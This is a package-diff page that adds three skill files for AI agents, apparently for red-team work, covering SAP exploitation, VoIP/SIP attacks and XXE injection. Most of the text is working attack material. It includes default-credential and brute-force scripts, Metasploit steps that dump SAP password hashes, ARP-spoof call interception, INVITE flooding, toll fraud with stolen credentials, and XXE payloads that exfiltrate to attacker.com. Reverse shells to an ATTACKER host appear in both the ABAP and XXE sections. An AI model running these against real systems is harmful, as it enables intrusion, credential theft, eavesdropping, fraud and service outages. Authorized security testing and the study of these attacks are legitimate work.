npm - rtexit-method - Versions diffs - 0.1.7 → 0.1.9 - Mend

rtexit-method 0.1.7 → 0.1.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (18) hide show

package/packaged-assets/.agents/skills/rt-sap-exploitation/SKILL.md ADDED Viewed

@@ -0,0 +1,275 @@
+---
+name: rt-sap-exploitation
+description: "SAP system exploitation skill for authorized engagements. SAP service discovery and fingerprinting, default credential testing, SAP RFC enumeration with Metasploit modules, ICM web server exploitation, SAP GUI attacks, ABAP code injection, SAP Message Server vulnerability (CVE-2020-6207), SAP Router bypass, SAP HANA database attacks, and privilege escalation within SAP. Use when engagement scope includes SAP ERP, S/4HANA, or SAP NetWeaver systems."
+---
+# rt-sap-exploitation — SAP System Exploitation
+## Overview
+SAP is the backbone ERP system for many large enterprises — it holds financial data, HR records, supply chain information, and business-critical processes. Compromising SAP is often the most impactful finding in an enterprise engagement. SAP systems are frequently misconfigured, run outdated patches, and use default credentials.
+---
+## Phase 1 — Discovery & Fingerprinting
+```bash
+# SAP port landscape
+# 3200-3299 = SAP GUI (DIAG protocol) — SID 00-99
+# 3300-3399 = RFC
+# 8000-8099 = ICM HTTP
+# 4300-4399 = Message Server
+# 3600 = SAP Router
+# 50000+ = SAP HANA
+nmap -sV -p 3200-3299,3300-3399,8000-8099,4300-4399,3600 TARGET_IP
+# Identify SAP system ID (SID) and instance
+# SID = 3-character identifier (e.g., PRD, DEV, QAS)
+# Instance = 2-digit number (00-99)
+# HTTP-based fingerprinting
+curl http://SAP_IP:8000/
+curl http://SAP_IP:8000/sap/bc/ping  # SAP alive check
+curl http://SAP_IP:8000/sap/bc/gui/sap/its/webgui  # Web GUI
+# ICM server info
+curl http://SAP_IP:8000/sap/bc/soap/wsdl?services=BAPI_ACTIVITYTYPE_GETLIST
+```
+---
+## Phase 2 — Default Credentials
+```bash
+# SAP default accounts (try ALL of these)
+# Format: username / password
+# System accounts (always exist)
+SAP* / 06071992       # Master superuser
+SAP* / PASS           # Alternative default
+DDIC / 19920706       # Data Dictionary user (has all authorizations)
+EARLYWATCH / SUPPORT  # Early Watch service account
+TMSADM / $1Pawd2&    # Transport Management
+# Application-specific
+SOLMAN_ADMIN / SOLMAN
+SAPSYS / MANAGER
+BASIS / BASIS
+# Try via SAP GUI (port 3200)
+# Or via RFC:
+python3 << 'EOF'
+import pyrfc  # pip install pyrfc
+connections_to_try = [
+    {"user": "SAP*",       "passwd": "06071992"},
+    {"user": "SAP*",       "passwd": "PASS"},
+    {"user": "DDIC",       "passwd": "19920706"},
+    {"user": "EARLYWATCH", "passwd": "SUPPORT"},
+]
+for creds in connections_to_try:
+    try:
+        conn = pyrfc.Connection(
+            ashost="SAP_IP", sysnr="00", client="000",
+            **creds
+        )
+        print(f"SUCCESS: {creds['user']}/{creds['passwd']}")
+        conn.close()
+    except pyrfc.LogonError:
+        print(f"FAILED: {creds['user']}")
+EOF
+```
+---
+## Phase 3 — SAP RFC Enumeration & Exploitation
+```bash
+# RFC = Remote Function Call — SAP's RPC mechanism
+# Many RFCs callable without auth or with low-priv auth
+# Metasploit SAP modules
+msfconsole
+# Enumerate RFC services
+use auxiliary/scanner/sap/sap_rfc_dbcon  # Database connections
+use auxiliary/scanner/sap/sap_rfc_eps_get_directory_listing  # Directory listing
+use auxiliary/scanner/sap/sap_rfc_read_table  # Read any DB table!
+# Read SAP database tables (often works with any valid user)
+use auxiliary/admin/sap/sap_rfc_read_table
+set RHOSTS SAP_IP
+set SID PRD
+set CLIENT 000
+set USERNAME ANY_VALID_USER
+set PASSWORD ANY_VALID_PASS
+set TABLE USR02   # User table (contains hashed passwords)
+run
+# Output: all SAP user accounts + password hashes
+# Crack hashes with hashcat -m 7700 (SAP CODVN B)
+# Read sensitive tables
+set TABLE RFCDES   # RFC destinations (contains cleartext passwords!)
+set TABLE ICFSERVL # ICF services
+set TABLE T000     # Clients/mandants
+# ABAP OS command execution (if RFC_OS_COMMAND available)
+use auxiliary/admin/sap/sap_rfc_os_command
+set COMMAND "id"
+run
+# → OS-level command execution on SAP server
+```
+---
+## Phase 4 — CVE-2020-6207 (SAP Message Server — Missing Auth)
+```bash
+# SAP Message Server on port 4300/4301 — no authentication by default
+# Allows registering rogue application servers → intercept connections
+# Check if vulnerable
+curl http://SAP_IP:4300/msgserver/text/logon
+# Exploit: register rogue app server
+# metasploit
+use auxiliary/admin/sap/sap_ms_rogue_dispatcher
+set RHOSTS SAP_IP
+set LHOST YOUR_IP
+run
+# → Can intercept SAP GUI connections → credential theft
+# sapms_exploit.py
+python3 sapms_exploit.py --host SAP_IP --port 4300 --sid PRD
+```
+---
+## Phase 5 — SAP ICM Web Attacks
+```bash
+# ICM = Internet Communication Manager (SAP's web server)
+# Exposed web services are often vulnerable
+# Find exposed ICF services
+curl "http://SAP_IP:8000/sap/bc/" -v
+# Look for: /sap/bc/soap/, /sap/bc/rest/, /sap/bc/gui/
+# XXE via SOAP
+curl -X POST "http://SAP_IP:8000/sap/bc/soap/wsdl" \
+  -H "Content-Type: text/xml" \
+  -d '<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<SOAP-ENV:Envelope>
+  <SOAP-ENV:Body>&xxe;</SOAP-ENV:Body>
+</SOAP-ENV:Envelope>'
+# SSRF via SAP web services
+curl "http://SAP_IP:8000/sap/bc/rest/testservice?url=http://169.254.169.254/"
+# Verb tampering on restricted services
+curl -X HEAD "http://SAP_IP:8000/sap/bc/admin/"
+curl -X OPTIONS "http://SAP_IP:8000/sap/bc/admin/"
+```
+---
+## Phase 6 — ABAP Code Injection
+```bash
+# ABAP = SAP's programming language
+# If you have SE38/SE80 transaction access → execute ABAP code → OS commands
+# Via SAP GUI (port 3200) with dev access:
+# SE38 → Create new program → Run
+# ABAP OS command execution:
+DATA: lv_command TYPE string.
+lv_command = 'id > /tmp/pwned.txt'.
+CALL FUNCTION 'SXPG_COMMAND_EXECUTE'
+  EXPORTING
+    commandname = 'Z_CMD'
+    additional_parameters = lv_command.
+# Read file
+CALL FUNCTION 'GUI_UPLOAD'
+  EXPORTING filename = '/tmp/pwned.txt'
+  TABLES data_tab = lt_data.
+# Reverse shell via ABAP
+CALL FUNCTION 'SXPG_COMMAND_EXECUTE'
+  EXPORTING additional_parameters =
+    'bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'.
+```
+---
+## Phase 7 — SAP HANA Database Attacks
+```bash
+# SAP HANA = in-memory database (port 30013, 39013)
+# Web IDE: port 8090
+# SQL port: 39015
+nmap -sV -p 30013,39013,39015,8090 HANA_IP
+# Default HANA credentials
+# SYSTEM / manager
+# SYSTEM / HanaSystem1
+# HANA web IDE (if exposed)
+curl http://HANA_IP:8090/sap/hana/ide/
+# SQL via Python
+python3 << 'EOF'
+from hdbcli import dbapi  # pip install hdbcli
+conn = dbapi.connect(
+    address="HANA_IP",
+    port=39015,
+    user="SYSTEM",
+    password="manager"
+)
+cursor = conn.cursor()
+# Dump all schemas
+cursor.execute("SELECT SCHEMA_NAME FROM SCHEMAS")
+for row in cursor: print(row)
+# Dump SAP application users
+cursor.execute("SELECT * FROM SAPHANADB.USR02")
+for row in cursor: print(row)
+# OS command via HANA procedure (if priv)
+cursor.execute("CALL SYS.SYSTEM_REPLICATION_STATUS()")
+# Or native stored procedures that allow file I/O
+EOF
+# HANA brute force
+hydra -l SYSTEM -P rockyou.txt HANA_IP -s 39015 -f tcp
+```
+---
+## Skill Levels
+**BEGINNER:** SAP port scan + default credential testing via browser/GUI + read USR02 table
+**INTERMEDIATE:** Metasploit RFC modules + CVE-2020-6207 Message Server + ICM web service attacks
+**ADVANCED:** ABAP code execution + HANA database access + full credential extraction
+**EXPERT:** SAP Router bypass + custom RFC exploitation + ABAP webshell deployment + SAP transport system backdoor
+---
+## References
+- SAP security research: https://www.onapsis.com/research
+- Metasploit SAP modules: https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/scanner/sap
+- CVE-2020-6207: https://www.cvedetails.com/cve/CVE-2020-6207/
+- SAP Hacking Guide: https://conference.hitb.org/hitbsecconf2011ams/materials/D2T2%20-%20Mariano%20Nunez%20-%20SAP%20Hacking.pdf
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/

package/packaged-assets/.agents/skills/rt-voip-sip/SKILL.md ADDED Viewed

@@ -0,0 +1,231 @@
+---
+name: rt-voip-sip
+description: "VoIP and SIP attack skill for authorized engagements. SIP enumeration with svmap/svwar, SIP credential brute force, INVITE flood DoS, call interception via ARP poisoning, RTP stream capture and decoding, SIP proxy authentication bypass, voicemail PIN brute force, SIP scanner fingerprinting (Asterisk, FreePBX, Cisco UCM), and toll fraud via unauthorized outbound calls. Use when engagement scope includes VoIP infrastructure, PBX systems, or unified communications."
+---
+# rt-voip-sip — VoIP & SIP Exploitation
+## Overview
+VoIP systems handle corporate phone calls, voicemail, and unified communications. SIP (Session Initiation Protocol) is the dominant signaling protocol. Compromising VoIP infrastructure enables: call interception, credential theft, toll fraud (making expensive calls at the company's expense), and pivoting through the VoIP VLAN into production networks.
+---
+## Phase 1 — Discovery & Fingerprinting
+```bash
+# Install SIPvicious
+pip3 install sipvicious
+# Or: apt install sipvicious
+# Scan for SIP devices (UDP 5060 by default)
+svmap 10.10.10.0/24
+# Discovers: SIP phones, PBX servers, gateways
+# Output: IP, User-Agent (reveals Asterisk, FreePBX, Cisco, etc.)
+# Enumerate extensions (SIP users)
+svwar -e100-200 10.10.10.10  # Enumerate extensions 100-200
+svwar -e100-999 10.10.10.10 -m REGISTER  # Use REGISTER method
+# Nmap SIP discovery
+nmap -sU -p 5060 --script sip-enum-users 10.10.10.0/24
+nmap -sU -p 5060 --script sip-methods 10.10.10.10  # Allowed methods
+# Find SIP over TCP/TLS
+nmap -sT -p 5060,5061 10.10.10.0/24
+# 5060 = SIP (UDP/TCP)
+# 5061 = SIP over TLS (SIPS)
+# Find web admin panels
+nmap -p 80,443,8080,8443 10.10.10.0/24
+curl -k https://10.10.10.10/  # FreePBX, Cisco UCM web UI
+```
+---
+## Phase 2 — SIP Credential Brute Force
+```bash
+# Brute force SIP accounts (REGISTER method)
+svcrack -u 200 -d /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.10.10
+# -u 200 = extension/username to target
+# Multiple extensions
+for ext in 100 101 102 200 201 300; do
+    svcrack -u $ext -d rockyou.txt 10.10.10.10 &
+done
+# Hydra SIP brute force
+hydra -l 200 -P rockyou.txt sip://10.10.10.10
+# Default credentials to try first:
+# Extension 200, Password: 200 (extension = password)
+# Extension 100, Password: 1234
+# admin / admin, admin / password
+# Extension / (blank password)
+# After credentials found — register as that extension
+# Use Linphone, Zoiper, or MicroSIP with stolen creds
+```
+---
+## Phase 3 — Call Interception
+```bash
+# ARP spoof to position between SIP phone and PBX
+# Then capture RTP (audio) stream
+# ARP spoof
+arpspoof -i eth0 -t PHONE_IP PBX_IP &
+arpspoof -i eth0 -t PBX_IP PHONE_IP &
+# Capture SIP + RTP traffic
+tcpdump -i eth0 -w voip_capture.pcap 'udp port 5060 or (udp portrange 10000-20000)'
+# Analyze with Wireshark
+# Telephony → VoIP Calls → select call → Play Streams
+# Decodes RTP audio in real time
+# rtpbreak — automatic RTP stream decoder
+rtpbreak -n -i eth0  # Live capture
+rtpbreak -d voip_capture.pcap  # From file
+# Output: separate .wav files per call
+# Play captured calls
+play call_1.wav  # (sox)
+# ucsniff — all-in-one VoIP sniffing tool
+ucsniff -i eth0 -t PHONE_IP -g PBX_IP
+# Automatic ARP spoof + capture + decode + save WAVs
+```
+---
+## Phase 4 — INVITE Flood (DoS)
+```bash
+# Flood PBX with INVITE requests → crash or degrade service
+# inviteflood
+apt install inviteflood -y
+inviteflood eth0 200 10.10.10.10 5060 1000
+# Sends 1000 fake INVITE requests to extension 200
+# svcrash — crash SIP devices with malformed packets
+svcrash.py -i 10.10.10.10
+# sipflood
+python3 sipflood.py --target 10.10.10.10 --port 5060 --count 10000
+```
+---
+## Phase 5 — Toll Fraud
+```bash
+# After obtaining SIP credentials → make expensive calls at company's expense
+# International calls, premium rate numbers
+# Register with stolen credentials and dial out
+# Using PJSUA (command line SIP client)
+pjsua --id sip:200@PBX_IP \
+      --registrar sip:PBX_IP \
+      --username 200 \
+      --password STOLEN_PASS \
+      --outbound sip:PBX_IP \
+      sip:+1900PREMIUMRATE@PBX_IP
+# Or: configure any SIP softphone
+# Zoiper / Linphone / X-Lite:
+# Account: 200@PBX_IP
+# Password: STOLEN_PASS
+# Dial: 9011 (outside line) + international number
+# In report: demonstrate by calling test number (never actual toll fraud)
+# Use: https://www.voip.ms test numbers or your own number
+```
+---
+## Phase 6 — Voicemail PIN Brute Force
+```bash
+# Voicemail systems often have short PINs (4-6 digits)
+# Access voicemail → hear confidential messages, password resets
+# FreePBX voicemail web access
+curl -X POST https://PBX_IP/admin/config.php \
+  -d "display=voicemail&action=login&mailbox=200&context=default&pin=1234"
+# Phone-based voicemail brute force
+# Dial voicemail access number → enter extension → brute force PIN
+# Use SIP client + DTMF automation
+python3 << 'EOF'
+import pjsua2 as pj
+# Dial voicemail, wait for PIN prompt, send DTMF tones
+# for pin in range(0000, 9999):
+#     send_dtmf(str(pin).zfill(4))
+#     if not "invalid" in response: print(f"PIN: {pin}")
+EOF
+# Default voicemail PINs
+# 1234, 0000, 1111, extension number, last 4 of phone number
+```
+---
+## Phase 7 — FreePBX / Asterisk Web Exploitation
+```bash
+# FreePBX web admin (default port 80/443)
+# Default creds: admin/admin, admin/password, maint/password
+# CVE-2019-19006 — FreePBX RCE (unauthenticated)
+curl -X POST "http://PBX_IP/admin/ajax.php?module=userman&command=verifyToken" \
+  -d "token=1"
+# Asterisk Manager Interface (AMI) — port 5038
+# Default: telnet PBX_IP 5038
+nmap -p 5038 PBX_IP
+telnet PBX_IP 5038
+# Login: admin/amp111 (FreePBX default)
+# AMI commands after auth:
+Action: Command
+Command: core show channels
+# See all active calls
+Action: Originate
+Channel: SIP/200
+Exten: +14155551234
+Context: from-internal
+Priority: 1
+# Make a call from extension 200
+# AMI → OS command injection (if Asterisk runs as root — common misconfiguration)
+Action: Command
+Command: shell cat /etc/passwd
+```
+---
+## Skill Levels
+**BEGINNER:** svmap discovery + svwar extension enum + default credential testing
+**INTERMEDIATE:** SIP credential brute force + ARP spoof + Wireshark VoIP call decode
+**ADVANCED:** RTP stream decoding to WAV + INVITE flood DoS + toll fraud demonstration
+**EXPERT:** FreePBX/Asterisk web exploitation + AMI command injection + encrypted SRTP decryption
+---
+## References
+- SIPvicious: https://github.com/EnableSecurity/sipvicious
+- ucsniff: https://github.com/pcapperez/ucsniff
+- VoIP security guide: https://www.voip-info.org/asterisk-security/
+- MITRE T1557: https://attack.mitre.org/techniques/T1557/

package/packaged-assets/.agents/skills/rt-xxe/SKILL.md ADDED Viewed

@@ -0,0 +1,181 @@
+---
+name: rt-xxe
+description: "XML External Entity (XXE) injection skill for authorized engagements. Classic XXE for file read, XXE-based SSRF, blind XXE via out-of-band (OOB) DNS/HTTP exfiltration, XXE in file uploads (SVG, DOCX, XLSX), XXE in SOAP/REST APIs, XXE via XInclude, error-based XXE, and XXE to RCE via PHP expect wrapper. Use when any XML input is processed by the application."
+---
+# rt-xxe — XML External Entity (XXE) Injection
+## Overview
+XXE occurs when XML parsers process external entity references in attacker-controlled XML input. Impact ranges from local file disclosure to SSRF to RCE. XXE is commonly found in: XML APIs, file upload endpoints (SVG, DOCX, XLSX), SOAP services, and applications using XML for data exchange.
+---
+## Phase 1 — Classic XXE (File Read)
+```xml
+<!-- Basic XXE — read /etc/passwd -->
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<root><data>&xxe;</data></root>
+<!-- Windows paths -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
+<root>&xxe;</root>
+<!-- Read sensitive files -->
+file:///etc/passwd
+file:///etc/shadow
+file:///etc/hosts
+file:///proc/self/environ     ← environment variables (may have secrets)
+file:///proc/self/cmdline     ← running process command
+file:///var/www/html/config.php
+file:///app/.env
+file:///home/user/.ssh/id_rsa
+<!-- PHP wrapper — base64 encode to avoid XML breakage -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>
+<root>&xxe;</root>
+<!-- Decode response: echo "BASE64" | base64 -d -->
+```
+---
+## Phase 2 — XXE-Based SSRF
+```xml
+<!-- Probe internal services via XXE -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
+<root>&xxe;</root>
+<!-- AWS metadata → get IAM credentials -->
+<!-- Internal port scan via XXE -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.10.10.1:8080/">]>
+<root>&xxe;</root>
+<!-- Different response/timing for open vs closed ports -->
+```
+---
+## Phase 3 — Blind XXE (Out-of-Band)
+```xml
+<!-- No response reflection → use OOB to exfiltrate -->
+<!-- Step 1: Host malicious DTD on attacker server -->
+<!-- attacker.com/evil.dtd: -->
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
+%eval;
+%exfil;
+<!-- Step 2: Send XML referencing your DTD -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
+<root>test</root>
+<!-- Monitor attacker.com access logs → file contents in URL params -->
+<!-- DNS-based blind XXE (firewalled HTTP) -->
+<!ENTITY % xxe SYSTEM "http://UNIQUE_ID.attacker.burpcollaborator.net/">
+<!-- Burp Collaborator: detect blind XXE via DNS lookups -->
+```
+---
+## Phase 4 — XXE in File Uploads
+```bash
+# SVG XXE (image upload that parses SVG)
+cat > evil.svg << 'EOF'
+<?xml version="1.0" standalone="yes"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<svg xmlns="http://www.w3.org/2000/svg">
+  <text font-size="15">&xxe;</text>
+</svg>
+EOF
+curl -X POST https://target.com/upload -F "file=@evil.svg"
+# DOCX/XLSX XXE (Office documents are ZIP archives containing XML)
+mkdir docx_xxe && cd docx_xxe
+cp legitimate.docx evil.docx
+unzip evil.docx -d evil_extracted/
+# Edit evil_extracted/word/document.xml:
+# Add XXE declaration at top
+zip -r evil.docx evil_extracted/
+curl -X POST https://target.com/upload -F "file=@evil.docx"
+# PDF XXE (some PDF parsers)
+cat > evil.pdf << 'EOF'
+%PDF-1.4
+1 0 obj
+<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
+EOF
+```
+---
+## Phase 5 — XInclude Attack
+```xml
+<!-- When you can't control the DOCTYPE declaration -->
+<!-- XInclude works inside XML document body -->
+<foo xmlns:xi="http://www.w3.org/2001/XInclude">
+  <xi:include parse="text" href="file:///etc/passwd"/>
+</foo>
+```
+---
+## Phase 6 — Error-Based XXE
+```xml
+<!-- Trigger parsing error to exfiltrate in error message -->
+<!DOCTYPE foo [
+  <!ENTITY % file SYSTEM "file:///etc/passwd">
+  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+  %eval;
+  %error;
+]>
+<!-- Error message contains: file not found: /nonexistent/root:x:0:0:root... -->
+```
+---
+## Phase 7 — XXE to RCE
+```xml
+<!-- PHP expect:// wrapper (if expect module loaded) -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
+<root>&xxe;</root>
+<!-- Response: uid=33(www-data) -->
+<!-- Escalate to reverse shell -->
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://bash -c 'bash -i >%26 /dev/tcp/ATTACKER/4444 0>%261'">]>
+```
+---
+## Skill Levels
+**BEGINNER:** Classic XXE file read (/etc/passwd) · SOAP/XML API testing · SVG file upload
+**INTERMEDIATE:** XXE-based SSRF for cloud metadata · Blind OOB via Burp Collaborator · DOCX/XLSX XXE
+**ADVANCED:** Error-based blind XXE · XInclude for restricted contexts · PHP filter chain via XXE
+**EXPERT:** XXE to RCE via expect:// · Custom DTD chaining · XXE in binary protocols that embed XML
+---
+## References
+- PortSwigger XXE: https://portswigger.net/web-security/xxe
+- PayloadsAllTheThings XXE: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
+- MITRE T1059: https://attack.mitre.org/techniques/T1059/